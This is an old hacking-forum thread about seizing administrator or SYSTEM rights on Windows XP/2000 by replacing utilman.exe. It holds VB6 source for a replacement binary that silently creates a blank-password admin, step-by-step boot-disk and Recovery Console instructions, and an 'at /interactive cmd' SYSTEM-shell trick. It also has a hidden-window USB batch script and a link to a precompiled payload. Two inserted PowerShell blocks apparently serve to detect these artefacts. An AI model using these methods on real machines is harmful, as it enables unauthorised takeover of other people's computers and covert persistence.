Gain SYSTEM/Administrative Access to Windows XP/2000


celltoolz

OK, here it is. Please post some input on what you think. Also, I'm trying to figure out a better way to gain access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain local administrative rights to a Windows XP/2000 computer without removing or cracking a user's password. In order for this to work the computer must have a CD-ROM drive, or another bootable device other than a hard drive.

(I'm stoned and it's 3:15 a.m., so I hope this makes sense)

Overview:

Windows XP/2000 allows you to run a program with SYSTEM level privileges before logging on. The name of the program is Utility Manager. It is located at C:\Windows\system32\utilman.exe for Windows XP and C:\WINNT\System32\utilman.exe for Windows 2000. So all you have to do is make your own program that creates an administrative account. The program that you create has to have the filename Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the computer uses the NTFS filesystem this will take a few minutes, depending on how fast the PC is.

First we need to make the program.

I used Visual Basic 6; here is the source code that I used to create the administrative account:

'#################################START###############################

Private Sub Form_Load()
    ' Create the account NewAdmin with a blank password ("""""" is an empty quoted string,
    ' so the command becomes: net user NewAdmin "" /add)
    Shell "net user NewAdmin " & """""" & " /add", vbHide
    ' Shell returns immediately, so wait for net.exe to finish before the next command
    Pause 1
    ' Put the new account in the local Administrators group
    Shell "net localgroup administrators NewAdmin /add", vbHide
    Pause 1
    MsgBox "Added Administrative User", 16, "Hacked XP"
    End
End Sub

' Pauses execution for the given number of seconds
Sub Pause(interval)
    Dim Current As Single
    Current = Timer
    Do While Timer - Current < Val(interval)
        DoEvents
    Loop
End Sub

'#################################END###############################

Compile this with the filename Utilman.exe; this is very important! What this program does is create a user named NewAdmin with a blank password and then add them to the Administrators group.

OK, now that we've made the program, let's move on...

FAT32

1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe

2. Add the newly made Utilman.exe to the floppy

3. Restart the computer with the floppy in it

4. After DOS loads, type C: and press Enter.

5. If it changes from A:\> to C:\> then you're doing good

6. Use this command: copy A:\utilman.exe C:\windows\system32\utilman.exe and press Y to overwrite the existing file

7. Restart the computer without the floppy in it

8. When it gets to the login screen press the Windows Key + U

9. Restart the computer if Fast User Switching is enabled (the graphical login with the picture next to the login name, XP only); if it is not enabled skip to step 10

9a. After restarting you should see a new user in the list named NewAdmin; click on this account and you have just gained administrative access to your PC.

10. After pressing Windows Key + U, type in the username NewAdmin and push Enter. That's it, you now have administrative access to your PC.

NTFS

Use a Windows 2000 Setup CD to gain access to the NTFS partition through the Recovery Console. From the Recovery Console you can copy over the hacked Utilman.exe. Once in the Recovery Console follow the same instructions as above from step 6. After copying over the file, restart your computer by typing exit or pushing CTRL+ALT+DEL. Remove the Windows 2000 CD. When Windows loads to the choose-user screen simply push Windows Key + U. After pushing Windows Key + U you should see a message that says "Added Administrative User"; restart the computer one last time, then choose the NewAdmin user account. This will have administrative privileges. It works, I've done it, and I hope you all enjoy this nice little hack ! ! ! (If you're trying to gain SYSTEM-level access you can replace UTILMAN.exe with one that opens a Command Prompt.)

LOL, I hope that made sense

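A defender-side check for the two artefacts the method above leaves behind, a replaced utilman.exe and a new member of the local Administrators group. This is an added example, not code from the thread or from the poster; it assumes PowerShell 5.1 or later on Windows 10 or newer, where Get-AuthenticodeSignature resolves catalog-signed system files and the LocalAccounts cmdlets are available.

```powershell
# Added example, not code from the thread. Assumes PowerShell 5.1+ on Windows 10 or later,
# so Get-AuthenticodeSignature resolves catalog signatures and the LocalAccounts module exists.

function Test-AccessibilityBinary {
    # Reports whether a logon-screen accessibility binary still carries a valid
    # Microsoft signature; a home-compiled file renamed to Utilman.exe is unsigned.
    param([string]$Path = "$env:SystemRoot\System32\utilman.exe")

    $sig    = Get-AuthenticodeSignature -FilePath $Path
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }

    [pscustomobject]@{
        Path          = $Path
        Status        = $sig.Status
        Signer        = $signer
        SHA256        = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
        LastWriteTime = (Get-Item -Path $Path).LastWriteTime
        # Anything but a valid signature from Microsoft deserves a closer look.
        Suspicious    = ($sig.Status -ne 'Valid') -or ($signer -notmatch 'Microsoft')
    }
}

function Get-LocalAdminAudit {
    # Lists local Administrators members with account timestamps; an account created
    # recently and never logged on (like NewAdmin in the post) stands out immediately.
    Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
        $member = $_
        # Domain members and groups have no local user record; those fields stay empty.
        $user = Get-LocalUser -SID $member.SID -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Name            = $member.Name
            ObjectClass     = $member.ObjectClass
            Enabled         = if ($user) { $user.Enabled } else { $null }
            PasswordLastSet = if ($user) { $user.PasswordLastSet } else { $null }
            LastLogon       = if ($user) { $user.LastLogon } else { $null }
        }
    }
}

# utilman.exe plus the three tools it launches (On-Screen Keyboard, Narrator, Magnifier),
# all of which live in System32 next to it; then the group membership.
foreach ($exe in 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe') {
    Test-AccessibilityBinary -Path "$env:SystemRoot\System32\$exe"
}
Get-LocalAdminAudit | Format-Table -AutoSize
```

Run it from an elevated prompt; the Suspicious column and any Administrators member with a recent PasswordLastSet and no LastLogon are the lines to follow up on.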

This hack has potential. I did not know that the utilman program could run before login. The hardest part of this hack is replacing the utilman.exe with your payload. I understand that you must do it outside of Windows, but I'm thinking there might be another way. Possibly a program that will run on next boot that replaces the file before Windows has a chance to lock it. If that's the case it could be implemented in a version of the Switchblade. Otherwise a way for automation would be necessary. For FAT32 it's pretty simple with an autoexec.bat, but most people are running NTFS now and unfortunately Linux has trouble writing to those partitions.

Thoughts?

(PS: excuse me if this doesn't make sense, it's 3am and I'm blitzed on pain meds)


Isn't this similar to replacing winlogon.scr (I think that's the filename) with, for instance, a renamed copy of cmd.exe? When that's done, reboot, wait 15 minutes for the "screensaver" to kick in and a command screen comes up. The pain with that technique is the 15-minute wait (hence I like the idea of using utilman.exe), along with replacing the file outside of Windows.

I like the idea of doing the replacement at the next reboot, but just wonder how feasible that is. I hope that someone comes up with a way.


The only suggestion I'd like to make at this point is to back up the utilman program before overwriting it, so that once the account has been created you can put the original program back. If the system wants to run it at boot I'd assume it needs it to do something that it won't be doing anymore with this hack in place.


Yes, make sure to always make backups... Forgot to mention that one. It's not really that important of a file though. All it is, is a program to launch the On Screen Keyboard, Narrator, and Magnifier. Not really a must-have file, but it would be a good idea to overwrite it with the original one after you're done, because you don't want everyone to have access to your computer just by pushing Windows Key + U :) Happy Hackin'

Cell Toolz


Here's a quick way to get SYSTEM access from the command line:

You only need enough privileges to run the 'at' command.

1. Pop open a shell. (Start -> Run -> cmd)

2. at [one minute later than the current time] /interactive cmd

One minute later a new shell will open up. This shell has SYSTEM level privileges. This works because the at daemon is run by LOCAL SYSTEM. So, you now have a SYSTEM shell. It's like exploiting a root process to get root.

For added fun, open up Task Manager and kill explorer. Then type 'explorer.exe' in your system-level shell. BAM! Now your desktop is running as LOCAL SYSTEM. All child processes will also have LOCAL SYSTEM as their owner, so you can in fact play root-level Minesweeper.

Enjoy!

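The 'at' trick works because the Task Scheduler service runs its jobs as LOCAL SYSTEM, so the artefact a defender watches for is task creation by an ordinary interactive user. The following is an added example, not code from the thread; it assumes PowerShell 5.1 or later and that the "Audit Other Object Access Events" subcategory is enabled so that Security event 4698 ("A scheduled task was created") is written.

```powershell
# Added example, not code from the thread. Assumes PowerShell 5.1+ and that the
# "Audit Other Object Access Events" subcategory is enabled, which is what writes
# Security event 4698 ("A scheduled task was created").

function Get-ScheduledTaskCreations {
    param([int]$Hours = 24)

    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull named fields out of the event XML rather than relying on positional indexes.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $content = $data['TaskContent']   # the task definition XML, as logged
        [pscustomobject]@{
            Time          = $_.TimeCreated
            User          = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            TaskName      = $data['TaskName']
            # Jobs created with at.exe are stored under the legacy "\At<n>" names.
            LegacyAt      = $data['TaskName'] -match '^\\At\d+$'
            # A task whose principal is S-1-5-18 (LOCAL SYSTEM) and whose action is a
            # shell is exactly the pattern described in the post above.
            RunsAsSystem  = $content -match 'S-1-5-18'
            LaunchesShell = $content -match '<Command>[^<]*(cmd|powershell)(\.exe)?</Command>'
        }
    }
}

Get-ScheduledTaskCreations -Hours 72 |
    Where-Object { $_.LegacyAt -or ($_.RunsAsSystem -and $_.LaunchesShell) } |
    Format-Table -AutoSize
```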


That only works if you have an admin account in the first place.


I don't know if this counts, or if it's already been posted someplace else in the forums, but I know an easy way to gain local Administrator account access on the machine in case you need that Windows version of the root account.

Steps are as follows:

  • Right-click on My Computer, choose Manage
  • Choose Local Users and Groups in Computer Management, open the Users folder
  • Right-click on Administrator, choose Rename, use any other name besides Admin or Administrator in any form
  • Right-click on the new username and choose Set Password; you can now change their password to anything you want
  • Rename back to Administrator, done

This isn't removing a password, or spending hours with a cracking application, or sitting there cracking it by staring at data all day, but I hope this helps people achieve the same thing you're looking for here. It's worked every time I've used it; I don't know if it'll work under a standard User Account (as set under Users in Control Panel).



I just tested this and it doesn't work; I get an access denied message when renaming the admin account.


Yes, the user I tried it with is a member of the Users group.

I assume that's the topic of this thread: regain admin access from a user-level account on the machine. Oh well, it seems the easier ways of direct system-level access all start with admin-level access. So this is a really good thread so far: admin to system-level access posted here, a terminal, and just taking over admin altogether with a new password, and the thread's topic of gaining admin in the first place.


To restore utilman.exe just add to your list:

ren c:\windows\system32\utilman.exe utilman.bak

copy a:\utilman.exe c:\windows\system32\utilman.exe

Also, after the restart and boot into DOS, just delete the utilman.exe you copied and then

ren c:\windows\system32\utilman.bak utilman.exe

This could be easily run on the Switchblade, floppy or CD boot disk...

Nice guide btw.

Also, this guy talks some bull. I've done most of what he has said before...

http://www.codeproject.com/useritems/HackXPSimpleWay.asp

Good overview of Windows Login

http://www.phlak.org/docs/microsoft/modify...credentials.txt

http://www.phlak.org/docs/

Oh... and I so don't remember how to use VB (it's been since I was in high school), so if you could compile it and post the exe that would be nice.


Here's the compiled version of the code - http://www.project420.web1000.com/utilman.exe

I've never used Switchblade; I'm checking it out right now. I like the way you did the backup, but I think you can use Windows File Protection to back it up if it ever gets lost... I know it's there somewhere.

Cool, thanks, I'll try this out sometime soon...

The .bak extension rename is safer, I think, than WFP. Only because what if WFP screws something up? I mean, with just renaming it you don't really have to worry about it.

Also check out Hiren's Boot CD 8.4; it has NTFS4DOS Pro on it, which has full NTFS read/write. I've had to do similar with the SAM and SYSTEM files on my grandparents' computer before.


cmdow @ /HID
@echo off

REM I suggest cmdow to make sure the .bat window isn't so obvious.
REM Now I look for the drive on which my switchblade is...
FOR %%i IN (D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %%i:\PlaceHolder.txt SET USB=%%i:\

REM Back up the original, drop in the replacement, then reboot
ren c:\windows\system32\utilman.exe utilman.bak
copy %USB%utilman.exe c:\windows\system32\utilman.exe
shutdown -r -f -t 30 -c "Command successful, restarting..."

REM Restore step, for the run after the reboot: rename the old placeholder
REM (so the drive search above stops matching) and put the original back
ren %USB%PlaceHolder.txt Restoring.txt
ren c:\windows\system32\utilman.bak utilman.exe

That's the long way, or you can simply set your Switchblade a fixed drive letter using a little program called USBDLM, which I still haven't tested, since I'm using a PXE Windows + portable Firefox to post messages while I fix both my computers. Hope you like the idea, and improve it / customize it.

cmdow http://www.commandline.co.uk/cmdow/index.html

USBDLM http://www.uwe-sieber.de/usbdlm_e.html


What kinda sucks about this approach is that you're accessing all drives. This is potentially slow (spin-up time for CDs and such) and a bit of a hit-or-miss.

Basically, you're running on the CD right now, so the other partition should be the next or previous drive letter, shouldn't it?

Alternatively, or possibly additionally, couldn't you use the drive label of the partition? Those might be faster to get to.



Kinda woke up, but it looks like you're referring to my post... Mmm, I understand what you're saying and it's 60% true for everyone in the world, which is not bad; it's the odds you get for an open heart transplant at age 80 (with only cardiovascular pathies). Must have misspelled somewhere (bad English)... WOAH!!! Anyways...

I used a partition manager (Hiren's BootCD) to partition + format my HD the way I wanted it just before I did a clean install of Windows, but this last time when I used the little program it recognized my portable media all-in-one slots (9 in total) as 9 different hard drives + 2 CD-ROMs...

:evil: So now I have my "Local Drive", otherwise known as my Windows main HD, as drive I: and my backup drive as C: :shock: And of course I can't use anything to change the drive letter of my main Windows drive, 'cause then I'll get some errors and I'll need to re-download my WinXP CD (which I lost and I gotta download).

This same scenario could be applied to every dual-boot person in the world that prefers Linux/Mac over Windows, and only keeps Windows in for special occasions (like playing the latest version of UT? Quake... or things like that).

I just hope the main developers of both Switchblade & this hack realize the potential of this little addon... Although the 2nd and shortest method will be good for speeding up hacks on pre-owned computers, it still works.



That only works if you have an admin account in the first place.

True, but really, who doesn't run Windows as a non-admin account. Yes, yes, yes, public terminals are an exception. But for individual users, everyone is admin.
